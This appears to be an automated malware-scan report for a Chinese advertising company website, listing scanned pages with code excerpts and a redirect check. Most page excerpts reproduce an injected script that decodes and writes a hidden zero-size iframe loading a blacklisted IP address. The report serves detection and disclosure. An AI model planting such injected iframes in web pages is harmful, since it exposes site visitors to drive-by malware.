Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trggw.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.trggw.com/ | 200 OK Content-Length: 2676 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2150 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function OutWord() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } OutWord(); // --> </SCRIPT> </HEAD> <BODY> </BODY> </HTML> <!--Öмä--> <div id="zhongbu"> <div id="zhongbu_top"></div> <div id="zhongbu_left"></div> <div id="zhongbu ...[437 bytes skipped]... | ||
http://www.trggw.com/AboutUs.asp | 200 OK Content-Length: 4465 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2166 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function OutWord() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } OutWord(); // --> </SCRIPT> </HEAD> <BODY> </BODY> </HTML> <div id="zhongbu"> <div id="zhongbu_top"></div> <div id="zhongbu_left"></div> <div id="zhongbu_zb"> < ...[2945 bytes skipped]... | ||
http://www.trggw.com/culture.asp | 200 OK Content-Length: 5156 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÆóÒµÎÄ»¯ - ¹ØÓÚÎÒÃÇ - רҵÐÂÐÍ»·±£·çÄܵ¥Á¢Öù¹ã¸æËþ|ÖÆ×÷|Éè¼Æ|·¢²¼|Ê©¹¤|¹ã¸æËþ</title> <meta name="Keywords" content="ÐÂÐͽÚÄܹã¸æËþ,µ¥ ...[5290 bytes skipped]... | ||
http://www.trggw.com/business.asp | 200 OK Content-Length: 4518 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2166 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function OutWord() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } OutWord(); // --> </SCRIPT> </HEAD> <BODY> </BODY> </HTML> <div id="zhongbu"> <div id="zhongbu_top"></div> <div id="zhongbu_left"></div> <div id="zhongbu_zb"> < ...[3562 bytes skipped]... | ||
http://www.trggw.com/news.asp | 200 OK Content-Length: 7753 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>¹«Ë¾¶¯Ì¬ - רҵÐÂÐÍ»·±£·çÄܵ¥Á¢Öù¹ã¸æËþ|ÖÆ×÷|Éè¼Æ|·¢²¼|Ê©¹¤|¹ã¸æËþ</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta name="Keywords" content="ÐÂÐͽÚÄܹã¸æËþ,µ¥Á¢Öù,¹ã¸æËþ ...[4895 bytes skipped]... | ||
http://www.trggw.com/product.asp | 200 OK Content-Length: 16746 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2095 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function OutWordµÚ159Ò³</option><option value='160'>µÚ160Ò³</option><option value='161'>µÚ161Ò³</option><option value='162'>µÚ162Ò³</option><option value='163'>µÚ163Ò³</option><option value='164'>µÚ164Ò³</option><option value='165'>µÚ165Ò³</option><option value='166'>µÚ166Ò³</option><option value='167'>µÚ167Ò³</option><option value= ...[2329 bytes skipped]... | ||
http://www.trggw.com/Print.asp | 200 OK Content-Length: 10704 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>·çÄܹã¸æËþ - רҵÐÂÐÍ»·±£·çÄܵ¥Á¢Öù¹ã¸æËþ|ÖÆ×÷|Éè¼Æ|·¢²¼|Ê©¹¤|¹ã¸æËþ</title> <meta name="Keywords" content="ÐÂÐͽÚÄܹã¸æËþ,µ¥Á¢Öù,¹ã¸ ...[4885 bytes skipped]... | ||
http://www.trggw.com/contractus.asp | 200 OK Content-Length: 8282 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÁªÏµ·½Ê½-רҵÐÂÐÍ»·±£·çÄܵ¥Á¢Öù¹ã¸æËþ|ÖÆ×÷|Éè¼Æ|·¢²¼|Ê©¹¤|¹ã¸æËþ</title> <meta name="Keywords" content="ÐÂÐͽÚÄܹã¸æËþ,µ¥Á¢Öù,¹ã¸æËþ,¹ ...[4602 bytes skipped]... | ||
http://api.map.baidu.com/api?key=&v=1.1&services=true | 200 OK Content-Length: 317 Content-Type: text/javascript | clean |
http://www.trggw.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.trggw.com/product.asp?ClassID=17 | 200 OK Content-Length: 11154 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2093 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function OutWord()pt:window.location='http://www.trggw.com/product.asp?ClassID=17&page='+this.options[this.selectedIndex].value;"><option value='1' selected >µÚ1Ò³</option><option value='2'>µÚ2Ò³</option><option value='3'>µÚ3Ò³</option><option value='4'>µÚ4Ò³</option><option value='5'>µÚ5Ò³</option><option value='6'>µÚ6Ò³</option><option value='7'>µÚ7Ò ...[2332 bytes skipped]... | ||
http://www.trggw.com/product.asp?ClassID=18 | 200 OK Content-Length: 10009 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2099 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function Out="100" border="0" /></a> </div> <div style="text-align:left; margin-left:5px; width:400px; line-height:20px;"> <div style="float:left;"> <a href="proShow.asp?id=1493" class="b" target="_blank" >ÌìÈÙ·çÄÜרÀû¹ã¸æËþ5</a> </div> <div style="line-height:30px;width:400px; text-align:left;"><a href="proShow.asp?id=1493" target="_blank" >& ...[2316 bytes skipped]... | ||
http://www.trggw.com/product.asp?ClassID=16 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.trggw.com/product.asp?ClassID=15 | 200 OK Content-Length: 16779 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2095 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function OutWordµÚ159Ò³</option><option value='160'>µÚ160Ò³</option><option value='161'>µÚ161Ò³</option><option value='162'>µÚ162Ò³</option><option value='163'>µÚ163Ò³</option><option value='164'>µÚ164Ò³</option><option value='165'>µÚ165Ò³</option><option value='166'>µÚ166Ò³</option><option value='167'>µÚ167Ò³</option><option value= ...[2329 bytes skipped]... | ||
http://www.trggw.com/product.asp?ClassID=14 | 200 OK Content-Length: 9898 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 220.128.95.71 ...[2101 bytes skipped]... itle="°¸Àýչʾ" >°¸Àýչʾ</a></li> <li><a href="Print.asp" title="·çÄܹã¸æËþ" >·çÄܹã¸æËþ</a></li> <li><a href="contractus.asp" title="ÁªÏµÎÒÃÇ" >ÁªÏµÎÒÃÇ</a></li> </ul> </div> </div> <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E" function O </div> <div style="text-align:left; margin-left:5px; width:400px; line-height:20px;"> <div style="float:left;"> <a href="proShow.asp?id=1156" class="b" target="_blank" >¼Ã¹ã¸ßËÙÉÌÇð±±³ö¿ÚÕ¾ÈýÃæËþ</a> </div> <div style="line-height:30px;width:400px; text-align:left;"><a href="proShow.asp?id=1156" target="_blank" > λÖà ...[2293 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trggw.com
Result:
GET / HTTP/1.1
Host: trggw.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: trggw.com
Referer: http://www.google.com/search?q=trggw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trggw.com
Referer: http://www.google.com/search?q=trggw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.